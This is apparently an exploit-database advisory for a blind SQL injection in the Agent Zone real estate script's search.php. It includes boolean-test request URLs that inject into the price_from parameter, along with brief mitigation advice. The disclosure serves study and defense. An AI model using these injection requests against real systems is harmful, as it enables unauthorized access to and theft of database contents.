header-logo
Suggest Exploit
vendor:
Agent Zone Real Estate Script
by:
Cagri Tepebasili
8,8
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Agent Zone Real Estate Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux Mint 12
2012

Agent Zone Vastal I-Tech Blind SQL Injection Vulnerability

The vulnerability exists in the Agent Zone Vastal I-Tech real estate script, which allows an attacker to inject malicious SQL queries via the 'price_from' and 'price_to' parameters in the 'search.php' script. By manipulating these parameters, an attacker can bypass authentication and gain access to sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

Agent Zone Vastal I-Tech Blind SQL Injection Vulnerability


# Date: 31.01.2012

# Author: Cagri Tepebasili

# Software : http://www.vastal.com/agent-zone-real-estate-script.html

# Tested on: Linux Mint 12

#####################################################################################################################

The First Step >>>
http://server/real/search.php?price_from=1000000.00+and+1=1&price_to=10000000.00

The Second Step >>>
http://server/real/search.php?price_from=1000000.00+and+1=0&price_to=10000000.00

Injection >>>
http://server/real/search.php?price_from=1000000.00[BlindSQLI]&price_to=10000000.00

Greetz : MythSEC <<<